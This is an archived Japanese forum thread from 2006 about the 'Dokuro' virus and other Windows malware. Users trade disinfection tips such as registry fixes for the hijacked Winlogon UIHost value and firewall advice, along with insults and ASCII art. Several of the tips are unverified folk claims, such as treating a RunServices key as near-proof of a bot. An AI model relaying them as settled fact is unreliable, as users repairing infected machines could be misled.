Windows 2000/XP で誤って exe ファイルの関連付けを変更し、一切のプログラムが起動しなくなった場合、次の手順で回復させてください。 [スタート]−[ファイル名を指定し実行] から command を実行します。 次のコマンドを実行します。 C:\>assoc .exe=exefile C:\>ftype exefile="%1" %* レジストリエディタを起動して 4) 以下のレジストリキーを修正します ・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon キーの "UIHost" という値の内容が、 C:\WINDOWS\system32\uidate.exe になっているのを C:\WINDOWS\system32\logonui.exe に変更 これが正攻法なのでこの通りにやってくださいな
C:\WINDOWS\タスク\At1.job 設定日:2006/12/10,開始時刻:22:00 間隔:毎週金曜日. C:\WINDOWS\network.exe 000.jpg.exeを実行しても HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon これの内容はまだ書き換えられないから C:\WINDOWS\network.exeが実行時に改変すると思われる。
そういう意味での偉大なら誰にでも出来そうだが? (恐らく)実験用のPCで感染実験して駆除方法を見つけたということに 凄いという意味だ。
いや まあ誰がみてもすごいと思うよ 強列なウイルスが出現した時 色々なとこから達人が現れるのがセキュ板のよさだと思う
兎に角fooさんが凄いことには変わりはない(・∀・)
foo様、駆除方法の(2)を、無知な僕にわかりやすく 説明してください(´・ω・)
fooさんはアダ被でも1,2を争うほどのスキルの持ち主だそうで。
(2)ができねぇ・・・(゚д゚ )
windowsのCD-ROMが必要なんだ。 手元にないよ。 ありがとうございました
>>718 Alt+F4連打して
何とかしてセーフモードでログオンしやがれ
その後に
>>704 をやれよ
もうこのスレおしまい じゃあ
CDブートの回復コンソールディスクを作る
http://lets-go.hp.infoseek.co.jp/kaihuku.html 今回このページでは、おもにメーカー製XPプレインストールパソコンのユーザーでWindows XPインストール用CDROMをお持ちでない方対象に、
3の方法を応用し、フロッピーディスクの代わりにCD-Rを使うことで、フロッピーレスな環境においても使える「回復コンソール起動CD」を作製する方法を紹介します。
XPパソコンがすでに起動しなくなっている状態でも、Win98以降のOSを搭載した別のパソコンがあれば、「回復コンソール起動CD」を作製できます。
レジストリエディタを起動したら、不正命令を検出して 閉じる以外させてもらえなかったよ。 きいいいいい!!
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 □□□□□□□□―――――‐┬┘ | ____.____ | | | | | | | ∧_∧ | | | |( ´∀`)つ ミ | ├─┐ | |/ ⊃ ノ | | ├─┘  ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |
>>722 ええと 制限出来るのはユーザーハイブの方でだけだから
セーフモードでAdministratorにログオンしてregeditを起動する
それからそのユーザーの
HKEY_USERS\S-1-5-21-xxxxxx-xxxxxxxxxx-xxxxxxxxx-1004\Software\Microsoft\Windows\CurrentVersion\Policies\System
このキーを削除してみる
ごめん。 ガチでAdministratorでのログイン方法知らないんだ^^;
WindowsXPならセーフモードで起動すれば、Administratorのアカウントが 出ると思うんだけど…ようこそ画面がドクロとなるとな…
fooさんの方法で出来ないのであればリカバリーするのが一番楽だろ…
同意 時に諦めも大事なことだし。
了解しました。 みんなありがとう。 ごめんね(´・ω・)
初心者なのか分からないし、知識あまりねーけど質問させて。 ドクロウイルスって前からあったよね。亜種とやらがでたって事? 新種と亜種の違いがよく分からんけど。
違いがわかる男は、つべこべ言わずに、思いっきり踏んでみる。 それが男ってもんよ
WinnyかShareで違法ブツをダウンロードしなくては踏めないようなウイルスでよくそこまで盛り上がれんな
犯罪者がたくさん居るスレはここですか?
このドクロはよ 歯が立たなかったら回復コンソールを起動して cd system32 copy logonui.exe uidate.exe 上書きしちまえば、これで起動するようになるんじゃないの?
>>733 でも駆除方法が発見出来たし、ただ盛り上がってるだけじゃない。
お前みたいな無関心な奴は自分で何かをしようとしないから役に立たない。
だからカエレ。
ベクターだって感染したファイルをばら撒いたしな
>>737 ほうっておけ
自分が被害者になってみなければ、
わからないのだから
それに自分だけは絶対に大丈夫と信じこんでいるんだからさ
こういう一生懸命必死に努力している人がいたから、 ウイルス定義パターンが配布され、その恩恵で守られているだけなのにな
検体を送った人がいたからカスペは昨日の昼には対応していたんだぜ
注意警告出した甲斐があった
>>740 バカか。一生懸命必死に努力する人間がいたことと
ベンダーから定義が配布されることはまったく別の話だ
妄想お花畑に埋もれてんなよ
別に必死に努力などしなくても普通にベンダーに送信するだけでシグネチャは配布されるわな。 何か変に酔っちゃって意味不明なことを言い出すのが出てくると痛い。 シグネチャが配布されるまでの時間稼ぎという方が近いだろう。
偏狭なやつばっか
746 :
名無しさん@お腹いっぱい。 :2006/12/11(月) 15:03:50
r ‐、 | ○ | r‐‐、 _,;ト - イ、 ∧l☆│∧ 良い子の諸君! (⌒` ⌒ヽ /,、,,ト.-イ/,、 l 「五分五分で勝てる」! |ヽ ~~⌒γ⌒) r'⌒ `!´ `⌒) 割合で五分五分ならたった5%同士じゃないか、 │ ヽー―'^ー-' ( ⌒γ⌒~~ / と思う人も結構いるだろう! │ 〉 |│ |`ー^ー― r' | しかし引分けを勝ちと考えれば勝率95%だ! │ /───| | |/ | l ト、 | 意外と侮れないぞ! | irー-、 ー ,} | / i | / `X´ ヽ / 入 |
747 :
名無しさん@お腹いっぱい。 :2006/12/11(月) 15:05:20
>>737 >>739 こんなウンコウイルスに一生懸命になって笑える
実際問題感染する前にAVで止めればそれまでだ
748 :
名無しさん@お腹いっぱい。 :2006/12/11(月) 15:06:26
>>740 たぶんヒッキーがヒマでやったんじゃないの?
それともお得意の神様誕生ですか?
お前らいつまでも馬鹿か
嫉妬しねーよ 引き分けを勝ちと考える その発想がまずどうなんだ。それに勝ち5 負け5って完全に数字固定してあるし 現実的に考えて90も引き分ける可能性は少ないのではないですか?勿論勝負事にもよると思いますし 実力にもよると思いますが。
____
/ \
/ ─ ─ \
/ (●) (●) \
>>751 ♪
| :::::: (__人__) :::::: |
\. `ー'´ /ヽ
(ヽ、 / ̄) |
| ``ー――‐''| ヽ、. |
ゝ ノ ヽ ノ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
753 :
名無しさん@お腹いっぱい。 :2006/12/11(月) 21:20:18
6月ごろ発生の山田オルとキンタマはノートンで検出できる?
あったりめぇよ
755 :
名無しさん@お腹いっぱい。 :2006/12/11(月) 21:37:26
6月ころアップされたファイルを落としてから調子悪いんだよね・・・ ログファイルなんて物ができるし
756 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 01:49:54
取り逃していたら古くても関係なしでしょ?前に食らったことがあった。2年前のウイルス 新種で騒がれる方がよっぽどいいです。 新種と亜種の違いがいまいち分からない。どう違うの?
757 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 01:57:36
自分のはどういうウイルスかわからんので気味が悪い。山田オルだと確実に 漏洩?それとも運が悪いと(変動IP)誰かに閲覧?全てダウンロード?
758 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 02:19:19
デスクトップにsettingなるフォルダを勝手に作られましたOrz なんのウイルスですか?フォルダ小僧なるものもHD上でみつけましたOrz
760 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 07:02:31
【使用OS】 XP sp2 【WINDOWS UPDATE】 自動 【ウィルスソフト】 ノートン2006〜2007 アップデート頻繁 【UPDATE】 自動、手動も時々 【スキャン】 時折 特に異常なし 【症状】 デスクトップにsettingなるフォルダが出現、中を見ると自分のDocuments and Settings の中身ぽいが中はすかすか、怖いのでスキャン後ゴミ箱、したら又出現し同様、以後 現れず。もうひとつのHDにテキストファイル式のログ発見、上記と同様廃棄 クリインスコ前に(つい先日)、HDの中をみたがTempにフォルダ小僧なるいやな名前の フォルダを発見、なかはスカスカ。もうひとつ最近使ったファイルのところに最近使った覚えの ないフォルダ(DVDに入れているものでHD上にデータはない)のなまえが・・・。 【やったこと】 10月ごろ尻毛バーガーの2G近いファイル(2ヶ月ぐらい前にアップされた時間の 経たものではあったのだが)はダウンしファイルサイズに比べ中身スカスカが気になるが・・・ 不覚にもいろんなフォルダをクリックしまくり 【とった処置】 クリインスコ済みだが・・・年賀状の住所録の流失かな? SSだと致命的かも、ファイル自体は偽名も散りばめられているので特定は難しい だろうが年賀状住所録だと送り先からOrz
761 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 07:05:22
あ、もうひとつ1週間ぐらい前から公表していないメルアドに石油の価格が 頻繁に届くようになって・・・おかしいなーーーと。
762 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 07:17:08
追記:ある商店にメールを送ったら返事の来るころ石油価格のメールも届きました。 ISPはDTIでIPは年中変動しているみたいですが2ヶ月近く流失しまくりかなOrz 尻毛バーガーは好みではなかったので高い代償ですかね?
なんかorzとか連発されるとふざけてるようにしか見えねーな
764 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 08:10:50
【使用OS】WinXP SP2 【WINDOWS UPDATE】自動 【ウィルスソフト】マカフィー 【UPDATE】してません 【スキャン】たまに 【症状】デスクトップが表示されたまま動きません 【やったこと】他板で壁紙を落としていました 【とった処置】セーフモードでウィルススキャンを実行したところPate.b、Pate.b.dllというウィルスに感染していました。 全てのファイルをスキャンすると、マカフィーをインストールした場所でスキャンが強制的に終了して もう一度スキャンを実行しようとしても出来ませんでした。 再起動してまたスキャンを実行したところ、またもマカフィーがインストールされた場所でスキャンが終了してしまいました。 これはどう対処すればよいのでしょうか…
>>765 最初にWindowsフォルダをスキャンしてウィルスを削除しちまえばいいんじゃないでしょうか?
その後に不具合があればウィルススキャンを再インストールすればいい
767 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 14:05:52
各社、ドクロウイルスに対応したようですね 大手3社はまだのようですが
バスター対応したんじゃね?
770 :
名無しさん@お腹いっぱい。 :2006/12/12(火) 16:55:00
772 :
771 :2006/12/12(火) 17:38:53
すまん。対応してた。 大元のファイルに対応。感染後のファイル(uidate.exe)は非対応。
【使用OS】 WinXP SP1 【WINDOWS UPDATE】とくにしてません。 【ウィルスソフト】 Norton AntiVirus 【UPDATE】 最新 【スキャン】 全スキャンしました 【症状】1.exeというファイルがネットに接続しようとしたところをNorton Internet Securityが検知して ファイルの場所を探したらC:\WINDOWSにありました。 接続を禁止したところ2.exeができて同様にネットに接続しようとし、禁止したら今度は3.exeが・・・ 【やったこと】 アップデートしたNorton AntiVirusおよびウイルスバスターのオンラインスキャンしても何も検知されず 【とった処置】 実行されてるプロセスを停止してファイルを削除 これはなんなのでしょうか?
>>774 IEだとindexf.html、Fxだとindexx.html、と分かれるから
VirusTotalを張る場合はディレクトリは削ってくれ。
>>772 検体の提出方法かベンダの解析方法に問題ありそうだな。
今解剖中。P2Pとかやってる人には想像つかんだろうけど
ナローでアップするには厳しいサイズだ…。
と思ったら
>>709 で既に解剖されてた。
さて提出してくるか…。
ドクロウィルスで C:\WINDOWS\system32\uidate.exe が発見された場合にはもう手遅れなんだから、 削除と同時に以下のレジストリ値も変更せねばならない。 ベンダーはこの辺わかってんのかな? ・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon キーの "UIHost" という値の内容が、 C:\WINDOWS\system32\uidate.exe になっているのを C:\WINDOWS\system32\logonui.exe に変更
780 :
777 :2006/12/13(水) 10:34:50
↑ついでにようこそ画面にされる(同じキーのLogonType)
781 :
名無しさん@お腹いっぱい。 :2006/12/13(水) 11:58:34
>>760 あれだけ流行ってた4ヶ月も前のファイルのウイルスに未対応って事あるかな?
卯留守としてうまく機能してない可能性もある
782 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 00:51:46
ブタ切りスマそ みんなはCWShredderは使ってますか?
使っていません
784 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 01:35:31
スパイウェアの検知ってウィルスバスターオンラインスキャンでもできますか?
785 :
むっく :2006/12/14(木) 02:01:07
PCのことがあまり分からず使っていたものです。。。。ここ何ヶ月かまえから、勝手にキーボードのnが打ち込まれていくのです。 直し方とか全く分からなくて・・・教えてもらえませんか?
>>785 キーボード交換してダメならリカバリ
それでもダメなら修理・・・と思う
知人は「r」連打だった
SafeModeもBIOSでもずーっと
「r」を選択、文字の打てる箇所は
全て「r」、ウィルスではなかった
788 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 05:59:12
畜生!キンタマに感染してた・・・NISの役立たず。おいらの写真が永遠の彼方に・・・
バカじゃねーの
>>788 悪いのはお前。
ウイルスに感染するようなヘタレは死ね
(^^;
792 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 12:02:55
憂いニーとか使うからだよね。 てか、ダウソしながら同時にウイルスチェックは出来ないの?
794 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 13:33:49
今までセキュリティ対策をしてなかったので 教えてください。 1、使用ソフト:ウインドウズXP 2、プロバイダーはヤフー、YahooBBに加入している 3、外人の友人が 結構いるので海外とのメールのやり取りが多い メール送信はアウトルックエクスプレス使用していますが 受信時は ヤフーメールにも受信されます。 相談事項: ヤフーで提供しているセキュリティと ノートン単独で販売しているのとは セキュリティとはどう違うのですか。ノートンのダウンロードタイプと パッケージタイプとは どっちがベストですか。
796 :
名無しさん@お腹いっぱい。 :2006/12/14(木) 22:31:25
>>787 答えも遅い、短い、詳しくない、答えもしない そんな下等生物が相手にされているだけでも
ありがたく思え。立場が分かってない
誰に ?
798 :
名無しさん@お腹いっぱい。 :2006/12/15(金) 13:58:35
>792不覚。山田のほうに注意が行き過ぎてた >793・・・金呉
山田に注意してたらキンタマに感染しました、だって 言い訳が馬鹿すぎ
800 :
名無しさん@お腹いっぱい。 :2006/12/15(金) 19:56:06
ウイルスバスター2006 リアルタイム検索 リアルタイム検索中にウイルス/スパイウェアが見つかったため、自動的に処理しました。処理の結果は次のとおりです。 . 処理の結果: . ファイル名: C:\WINDOWS\system32\jsdll.dll ウイルス/スパイウェア名: Possible_Infostl これってなんですか?
802 :
名無しさん@お腹いっぱい。 :2006/12/15(金) 20:12:30
Win32:Rbot-CXN [Trj] このウイルスの効果知ってる人居たら教えて欲しい これと関係あるかどうかは分からないけど 最近2chやその他の特定のサイトは開くんだがグーグルとかが表示されなくなった・・・orz
hosts ファイルは書き換えられていませんか?
【使用OS】 WinXP 【WINDOWS UPDATE】 してない 【ウィルスソフト】 入れてない 【UPDATE】 してない 【スキャン】 BKDR_RBOT.CA 【症状】 特に無い 【やったこと】 ネットに繋いでいるとISPから電話が掛かって来てBOTと呼ばれる ウイルスに感染しているから駆除ツールを使って駆除してくださいと言われた 【とった処置】 サイバークリーンセンターというサイトからBOTの駆除ツールを落として実行
>>806 > ネットに繋いでいるとISPから電話が掛かって来てBOTと呼ばれる
> ウイルスに感染しているから駆除ツールを使って駆除してくださいと言われた
こんなのってありなの?
ISPが勝手にウィルススキャンやってんの?
ISPがウイルススキャンしなくてもBOTに感染してるかどうかは分かるだろが
【WINDOWS UPDATE】 してない 【ウィルスソフト】 入れてない 【UPDATE】 してない
>807 なんかYahooのニュースで聞いたことがある。 >809 bot系ウイルスはルータがあれば、ほとんど防ぐことができる。 ネットに繋ぐときはルータは必須。 ルータが無ければFW有効。 >810 再感染w
でも、bot系ウイルスってこれと言った症状は出さない(出したとしても気にならない程度) だから、感染に気づくのが遅くなるというわけ。 まあ、BOT系ウイルスのほとんどが↓のレジストリサブキー(WindowsXP/2000のみ・Windows98/MEは初めからある) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesを作成する。 WindowsXP/2000で上記のキーが存在している場合は間違い無く、BOT系ウイルスに感染している可能性が高い。
>>811 > bot系ウイルスはルータがあれば、ほとんど防ぐことができる。
ユーザによる手動インストールによってコンピュータに侵入するbotも結構あると思うんだが
>>802 氏はルータもFWもいれてなかったのかな?
>813 それそれ。 てか、今更って感じもするけど。 814 >ユーザによる手動インストールによってコンピュータに侵入するbotも結構あると思うんだが フリーソフトインストールしたとき(EULA読まずに同意して)感染の場合もあるんだっけ? 俺は>811では「ほとんど」と言っただけで、完全とか絶対とかは言ってないので、 最後の砦がユーザー自信の注意力にあるんだけどな。
おまいらニュース見ろよw 感染ユーザーが多いから直接ユーザーに連絡して 駆除ツールがあるサイトに誘導してどうのこうの〜と。 つい最近のNHKのニュースで言ってたよ。
>816 でもbotってWindowsXPにデフォルトで付いているFWを無効化したりできるわけだよね? (さらに有効にできないようにレジストリに変更を加えるわけだが) 駆除ツールでbotによって改ざんされたレジストリも修復してくれるのだろうか…
819 :
814 :2006/12/16(土) 00:20:18
>>815 >>805 なんかはトロイ扱いになってるわけで単にファイル名を偽装してるだけだと思う
p2pでも感染するだろうし侵入方法は多様化してると思う
> 最後の砦がユーザー自信の注意力にあるんだけどな
そういうことですね
たいしたセキュリティ対策も講じていないくせに、自分だけは大丈夫、感染しているはずないって信じ込んでいるからさ。 それで、他人のPC攻撃の踏み台にされているわけだから、迷惑もはなはだしい。
>820 WindowsXP(SP無し)はリカバリ直後は無防備状態 これでネットに接続すると数秒でボットに感染する。 ServicePack2をインストール→ルータの設置→Windowsのファイアーウォールを有効にする(全般タブにある例外を許可しないにチェックを入れておく) たったこれだけの設定だけで、ネットワークから侵入してくるボットは防げる。 上記の設定に加えて、アンチウイルス・アンチスパイをインストール→MU→アンチウイルス・アンチスパイの定義ファイルを更新。 ここまでやれば充分… と言いたいとこなんだが、一瞬のミスや油断が命取りになると言うことはいうまでもない。 一番確実な対策はネットに繋がないってことだ。
>>821 テクニカルな問題というよりも、普段からのセキュリティ意識の問題。
どうせ、スキャンも通信ログチェックさえもしてないんだろう。
>822 俺を舐めてるな
>>823 んにゃ
感染してることに気づけないやつに対する、一般論だよ。
ちゃんとしている人はしているし、していない人はしていない、と言うより
意識そのものが欠落しているってこと。
>824 こっちこそすまん ところで>822でさ、スキャンや通信ログのチェックって言ってるけど、 ルートキットと呼ばれるテクニックを使うボットが出てきて、 スキャンにもかからず、通信ログが改ざんされたりしていたら?
826 :
名無しさん@お腹いっぱい。 :2006/12/16(土) 01:24:23
こんなメンドイんならマックにしちゃうぞ!
>>825 そりゃ、新種を開発するやつもあの手この手を考えて、
既存の手段では対処できないのがでてくるだろうが、
俺はその手のエキスパートじゃないから、
既存のものでしか対処は出来ない。
でも、新手のものに対処できるものが開発されれば、
もちろんすぐにでも導入するよ。
俺はあくまでも、いちユーザーさ。
初めて投稿させて頂きます。 例の起動するとドクロが出る症状にかかっています。 セーフモードで立ち上げた後にAlt+F4を連打しているのですが ドクロが消えません。 どなたか同じ症状の方いらっしゃいませんでしょうか?^^;
マックでも感染はするよ。 Windowsより感染しにくいだけ。 >827 既存のものなら、本当に基本さえやっていれば良いと思うけど 新種のウイルスとか(上のレスで話題になってたドクロちゃん)は 色々と情報を集めたりしなければならないし… このイタチゴッコに終わりはあるのだろうか?(ウイルス作るのも、ウイルスを駆除するのも 同じ人間がやるんだから絶対無いよな)
>828 ドクロの駆除方法は>690リンク先参照 でも基本的な解決策はリカバリ
>>813 もそうだけど(これは主に日本国内限定の監視網)
世界規模の赤米といい、徐々に(国家や組織なりがその気になれば)、
全世界規模の監視・対スパイ網が構築されつつあるように感じる。
その中で個人情報なりがどの程度把握・監視されているのかはわからないが・・・
>>830 お返事どうもです^^
690のリンク先通りにしようとしても出来なかったのでご相談しました。
やはりリカバリしかないのでしょうか・・・orz
>832 もしかしてリカバリに自信が無いとか? 取り扱い説明書見てもピンと来ないとか? リカバリに必要な物(リカバリディスクは持っている?
人によっては、リカバリも出来ないほど HDのマスター領域部分まで破壊されたと言う情報もあるぐらいだから 場合によっては、ローレベルフォーマットが必要かもね。 感染した場合どの程度まで被害が及ぶかの、 全貌がいまだはっきりとはしていない。
ども。802です
サイトが繋がらない問題は時間を置くと繋がりました。回線に問題があったのだろうか・・・が、特定のサイトってのが引っ掛かる
>>805 を見ましたがあらかたそのウイルスの症状は見られませんでした。note.exeも作成されていません
RunServicesという項目はなかた・・・まだ悪さはしてないのかな
とりあえずavastを使って隔離したチェストの感染ファイルを消去しようと思うのですが
C:\System Volume Information\_restore{09C4EF5F-CFD0-4948-AF0F-647BF97EBE38}\RP543\A0044645.exe
このようなファイルを消すとPCの動作に影響を及したりするのでしょうか?
>834 >HDのマスター領域 所謂マスターブートレコードと言う奴だろうか。 リカバリで治らないなら、山田や100ボとかの大手電気店にPCを修理に出す という方法を取るしか… >835 >C:\System Volume Information\_restore システムの復元のバックアップファイルが保存されているフォルダ 一旦システムの復元を無効→即有効→再スキャンで見つからなければ良い。 ひとつ聞くけど、>802で言っていたWin32:Rbot-CXN [Trj]というウイルスは リアルタイムで検出されたのか、手動でのスキャンによって検出されたのかどっち 検出されたとして、検出された場所はどこ?
832です。
>>833 さん
リカバリディスクを無くしてしまいまして・・・
もうこれは家電販売店に持っていくしかないですよね^^;
>>836 それそれww
「ブート」を書いたつもりが手違いで消えたままアップしちゃった。
>>837 「取り扱い危険物」って書いてもっていけば?w
>837 リカバリディスク無くしたの? リカバリディスクが無いとリカバリできないし(HDDにリカバリ領域がインストール されていればリカバリディスクが無くてもリカバリは可能だが) 店員に相談してみては? >838 マスターブートレコードの修復なら、回復コンソールでログオンして fixmbrでできるらしいが。
>840 >そのフォルダのファイルの方が手動で検知 C:\System Volume Information\_restoreですよね。 これなら、システムの復元を無効→即有効で処理できます。 この後でスキャンしてウイルスが無ければ問題は無いかと。
>>839 そっかー
一番いいのは、新しくHD買って使用かな。
金はかかるが、一番手間がかからず安全確実ww
>>841 操作の後検査してみましたが、ウイルスは検出されませんでした。ありがとうございましたm(_ _)m
846 :
名無しさん@お腹いっぱい。 :2006/12/16(土) 03:30:25
>>821 前から思ってたんですけどブラスターなども猛威をふるったからネットに繋ぐな
ってよくいわれますけど、最初ネットに繋がなきゃどうしようもないじゃないか
と思うんですが、そこはどうなっているんですか?
OSもAVも繋がないとアップデートできないでしょ。
>>846 だからルータ導入するんだろ、外部からの接続拒否するために
>>846 問題なのは開いている135と445ポート
ネットワークワームがこのポートを利用してネットワークサービスにバッファオーバーフローを起こして
二次的にいろいろな物をインストールする。
現在では、これらのポートに飛んで来るパケットでも、
単に以前のSasserやBlaster以外にいろんな種類のものをインストールされる。
要はファイアーウォールやルーターなどで遮断しちまえばいいだけ。
XP SP1以降ならOSに標準でファイアーウォールが付属しているだろうよ。
SP2ならさらに標準でファイアーウォールが有効になっている。
また、現状でSP2ならファイアーウォールを無効にして、
開いているそれらのポートに素通しでパケットをスルーさせてもバッファオーバーフローを起こさないから
ネットワークワームには感染しない。
つまり、外部からの勝手にアクセスしてくるパケットは遮断した状態で
即効でMicrosoftUpdateで最新の状態にしちまうのが一番安全。
ウィルスに感染して(´・ω・`)ショボボーン
http://pc7.2ch.net/test/read.cgi/pc/1062738190/762 762 名前:名無しさん[] 投稿日:2006/12/16(土) 08:20:26 O
ZIPをスキャンしてなにもなく そのまま解凍してTXTを開いたらメディアプレイヤーの画面になって再起動とゆうより強制終了→起動を繰り返すのだがなんでかわかります?
767 名前:名無しさん[] 投稿日:2006/12/16(土) 09:49:50 O
スキャンかけるにも起動直後にプレイヤー画面→強制終了だからなにもできないのさ もう窓から放り投げるしかないかなー
??また新種か??
852 :
名無しさん@お腹いっぱい。 :2006/12/16(土) 17:57:42
>>848 いいたいことはだいたい分かるけどちとおれにゃ難しいな。
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
pariteに感染しましたー
854 :
名無しさん@お腹いっぱい。 :2006/12/17(日) 06:56:43
あやしいファイルを踏んでから変なメールが来たり挙動がおかしいかったので 相談したところクリーンインストールといわれ実行してからメールが来なくなりました が、これは何のウイルスだったのでしょうか?
>>854 知るか。
そんなのお前が知っておくべき事だろ。
読んだつもりなのですが、過去レスに被っていたらスミマセン 【使用OS】 Win2k 【WINDOWS UPDATE】 7日前 【ウィルスソフト】 ウィルスバスター2007(恐らく感染後) 【UPDATE】 自動 【スキャン】 特になし(システム再インストール後) 【症状】 定期的にシステムファイルが壊れて起動できなくなってしまう。 【やったこと】 特に思い当たる節無し・・・ 【とった処置】 今のところシステム再インストール 知人のパソコンなので、前日偶々モニターのドライバーがインストールできない相談を受けて 覗いていたのですが、次の日にシステムが立ち上がらない知らせを受け、セーフモードで 立ち上げようとしたのですがシステムファイルが壊れて立ち上がりませんでした。 その後、そのPCが本人ではなくさらに知人から頂いた物で、更に数週間前からクラッシュしては 再インストールを繰り返しているとのこと。最初はルーターのファイアーウォールをあてにして、 ウィルスソフトを入れていなかった事も後から判りました。 BIOSが書き換えられているのではないかと思い、BIOSのUPDATEを試そうかと考えていますが、 如何な物でしょうか?
>更に数週間前からクラッシュしては >再インストールを繰り返しているとのこと。 ウイルス以前に、HDDが逝っちゃいそうなんではないかい?
858 :
856 :2006/12/17(日) 13:32:51
確かにHDDも危険そうですが、毎回同じ壊れるファイルなので何かに常駐し居るのは 確かなようなんですが・・・ スミマセン、もう少しお伺いしたいのでAGEさせて頂きます。
再インストールってクリーンでなくて? 或いはシステムはCドライブでデーターはDドライブとかでCをクリンインスコとか?
たとえばこんなウイルスもあるぽ。(HDDのフォーマットでは駆除できない) ・ブートセクタ感染型ウイルス:BSI ハードディスクを起動するブートセクタに感染するウィルスです。 MBRを攻撃するウィルスもあり、BSIの「MBR型」と呼ばれることもあります。 ブートセクタ感染型ウイルスは既存のブートセクタを置換するか移動させます。 システムに長時間潜むものがほとんど、またブート情報を破壊したり HDDを強制的にフォーマットさせるものもある。 起動時に実行されて再起動できなくなる場合があるので 駆除できるまではパソコンの電源は切らないほうが良い(WindowsNT 2000 XP環境) システム領域(ブートセクタ、パーティションテーブル)に感染することから 「システム領域感染型」と呼ばれることもあるようです。
862 :
856 :2006/12/17(日) 14:34:05
>>859 ,860さん共にレス有難う御座います。
フォーマットしてからインストールしてるはずですが・・・(前回までは自分ではないので;)
因みにHDDは1ドライブで使用しております。
そういえばフートセクタ感染型もありましたね。
昨日セーフモードで起動させようとして見た段階では、
・・・\SYS32\config・・・が壊れています
というメッセージが出て止まりました。もう少しきちんと控えておけば良かったのですがorz
M/BはASUSのK7V(SlotA Athron800)で、G/BはMillennium400です。
デバイス関係のチェックはクラッシュ前のOS上、特に問題は見えませんでした。
863 :
856 :2006/12/17(日) 14:36:42
>>861 そういえばメモリチェックはしておりません。
只、光を繋ぐ前は特にトラブルもなかったようです。
まずはHDDメーカー提供の専用ツールでチェック 問題あれば、これも専用ツールでローカルフォーマット これで治らなければ、そのHDDは捨て
chkdsk /r を実行かな。
おいらは¥system32\\hal.dllがこわれてるってエラーがでて起動できないことが続いた
サポに電話してみたらやっぱhddが逝きかけてるっていわれた
>>865 をやったらちょっとよくなったような希ガス
てか スレちっぽくね?
ブートセクタ感染型のウイルスって BIOSのセットアップメニューで ブートセクタの書き込みを「禁止」にすればいいんでないの?
【使用OS】 XP HOME SP2 【WINDOWS UPDATE】 している 【ウィルスソフト】 ウイルスバスター2007 【UPDATE】 している 【スキャン】 二週間に一回程度 【症状】 ウイルス検索にかけたら途中で「ウイルスを駆除できません」というメッセージが4回ほど出てきました。 検索結果にはウイルスは見当たらないと表示されました。 その後、不定期にいきなりウィンドウズのエラー報告が表示されます。 コンピュータすべてをウイルス検索にかけても途中で「ウイルスを駆除できません」と表示されそのまま終わってしまいます。 【やったこと】 ダウンロードしたファイルをウイルス検索にかけたら「ウイルスを駆除できません」が表示されました。 【とった処置】 無知なのでとくに何もしてません・・・。
869 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 03:07:50
>>869 君の漠然とした質問に「答えろ!」というほうが無理なんだよ!!
そういう症状を引き起こすウイルスやスパイウェアが世の中に何万あると思っているんだ?
871 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 03:43:14
出現から2週間ぐらいの山田やキンタマって新種?
イメージファイルをウイルス検索できるのってビットディフェンダー以外に何がありますか? イメージファイルを検索させたらただでさえ遅いのがむちゃくちゃ遅いですけど。
典型的な教えて君だったなw
874 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 04:36:53
ウイルスに感染しまくっている場合、競合して無力化されることはないの?
イメージを検査するのは犯罪者ぐらいだもんな
2chでウィルスのアドレスが時々貼られてるけど、それはどこに通報したらいいの?
878 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 06:29:23
連続投稿ですか?? 8回
<<871シネヨカス <<873オナニーでもしてろ <<875 そりゃお前の顔だ
880 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 06:33:45
,,-‐''""''ー--,-
>>1001 遅いんだよバカ、とっとと次スレ立てろ(プゲラ
.|""" ||
>>999 何が1000だ、寝言は寝てから言え
::::::::::::::::::::::::::: | げ と .||
>>998 体臭が回線を通じて匂ってきてるぞ(w
::::::::::::::::::::::::::::::: | 1000 っ .||
>>997 糞レスしてる暇あったら今日の寝床探せ
:::::::::::::::::::::::::::::::::::::::::::::::| ,ノ""""'||
>>996 お前はハンバーグの材料な
:::::::::::::::::::::::::::::::::: | ,/""" .|| .
>>995 深夜に空き缶拾い集める癖を直せ
:::::::::::::::::::::::::::::::::: """" .|| .
>>994 以下はiriaからやりなおせ
/ )
/ /||
/ /.
( ( /⌒ヽ
ヽ ヽ⊂ ̄ ̄ ̄⊃ <ぐわっはっはっは!!!!
\\(´∀` ) n ダウソ板は永遠に不滅だ!!!
ハ \ ( E)
| /ヽ ヽ_//
http://tmp6.2ch.net/download/ >>1001 早く次スレ立てろよ、バカ
882 :
名無しさん@お腹いっぱい。 :2006/12/18(月) 06:46:41
